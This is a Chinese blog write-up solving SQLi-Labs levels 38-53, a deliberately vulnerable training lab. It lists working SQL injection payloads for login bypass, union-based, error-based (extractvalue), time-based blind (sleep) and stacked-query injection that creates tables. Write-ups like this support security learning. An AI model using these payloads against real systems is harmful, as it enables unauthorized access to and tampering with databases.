zoukankan      html  css  js  c++  java
  • SQLI LABS Stacked Part(38-53) WriteUp

    这里是堆叠注入部分

    less-38:
    这题啥过滤都没有,直接上:

    ?id=100' union select 1,2,'3
    

    less-39:
    同less-38:

    ?id=100 union select 1,2,3
    

    less-40:
    输入?id=1',无语法错误回显。改成?id=1' and '1,返回与?id=1相同的结果。尝试:

    ?id=100' union select 1,2,'3
    

    无返回结果,试试是不是有括号:

    ?id=100') union(select 1,2,'3
    

    成功回显。

    less-41:
    测试方法同上,发现是数字型注入,尝试:

    ?id=100 union select 1,2,3
    

    成功。

    less-42:
    这题本来以为是前面那个重置任意用户密码漏洞,可是这题无法创建用户。故猜测是登录绕过,尝试:

    username=abc' or 1#
    password=abc' or 1#
    

    登录成功:

    一下就过来了,想再好好试一下:

    username=abc' or 1#
    password=abc
    

    登录失败,下面换成password试试:

    username=abc
    password=abc' or 1#
    

    登录成功。

    less-43:
    还是像上题一样,先试试:

    username=abc' or 1#
    password=abc' or 1#
    

    返回语法错误,根据报错位置,判断是password存在注入,而且注意一下,password是被括号包裹的。payload:

    username=abc
    password=abc') union(select 1,2,'3
    

    登录成功:

    less-44:
    继续试:

    username=abc' or 1#
    password=abc' or 1#
    

    登录成功!后来测试发现是password的注入。
    ps: 这种简单粗暴的解法效率还挺高的~

    less-45:
    继续用上面的方法尝试:

    username=abc' or 1#
    password=abc' or 1#
    

    发现并无报错,换成双引号也是,说明是没有错误提示的。尝试是否有括号:

    username=abc') or 1#
    password=abc') or 1#
    

    登录成功。

    less-46:
    这题参数名变成了sort,推测注入点在order by,估计SQL语句如下:

    select * from users order by sort
    

    由于注入点在order by后面,所以没法使用union了。只能使用盲注,或者报错注入。这题名字就叫报错注入,payload:

    ?sort=(extractvalue(1,concat(0x7e,database(),0x7e)))
    

    less-47:
    这题跟上面差不多,只不过sort变成了单引号字符串,所以payload也稍有不同:

    ?sort=1'-(extractvalue(1,concat(0x7e,database(),0x7e)))-1'
    

    报错语句的前后两个减号主要是用于与前后两个1形成一个完整的字符串

    less-48:
    这题没有报错回显,通过一些列fuzz,发现还是个数字型注入,fuzz方法如下:

    ?sort=1
    ?sort=2-1
    

    这两个返回的是同一个页面,说明2-1被运算了。又由于没有回显,所以只能盲注了。用之前的脚本常规操作一波吧。

    less-49:
    这题还是fuzz,当输入一个单引号时不回显数据,所以这题是个单引号注入。经过一番测试发现无论输入什么,只要不是奇数个单引号,都会回显相同的内容。既然没有变化的回显就只能用时延盲注了:

    ?sort=1'-if((1=1),sleep(5),1)-'1
    

    回车之后发现后端会处理五秒左右,所以就从这里注入了。还用之前的脚本,把if中的条件换一下就ok了。

    less-50:
    这题测试一下发现注入方法跟less-46一样,估计是个非预期解,故看一下文件名,是个堆叠注入。之前一直以为堆叠注入是union注入,现在才知道意思是两个SQL语句。由于这题是数值型,也没什么过滤,很容易再构造一个语句,先看一下数据库有哪些表:

    payload:

    ?sort=1; create table hello like users
    

    注意一下,create table hello后面要加上like users,因为如果直接create table的话,表是没有字段名的,所以无法创建。

    less-51:
    跟上一题一样,只不过是个单引号字符串,payload:

    ?sort=1';create table hello2 like users--%20
    

    less-52:
    数值型注入,跟上面差不多:

    ?sort=1;create table hello3 like users
    

    less-53:
    输入单引号后不返回信息,说明这是个单引号注入。继续上面的payload:

    ?sort=1';create table hello4 like users
    
  • 相关阅读:
    (二)unittest之跳过测试和预期失败的用例
    (一)基本使用
    python从入门到入魔
    (十)中断测试
    (九)进程测试
    (八)安装、卸载与升级更新测试
    (七)功能测试
    (六)内存分析,待补充
    (五)跑Monkey过程中出现的ANR问题分析
    (四)一种精准monkey测试的方法
  • 原文地址:https://www.cnblogs.com/litlife/p/8613541.html
Copyright © 2011-2022 走看看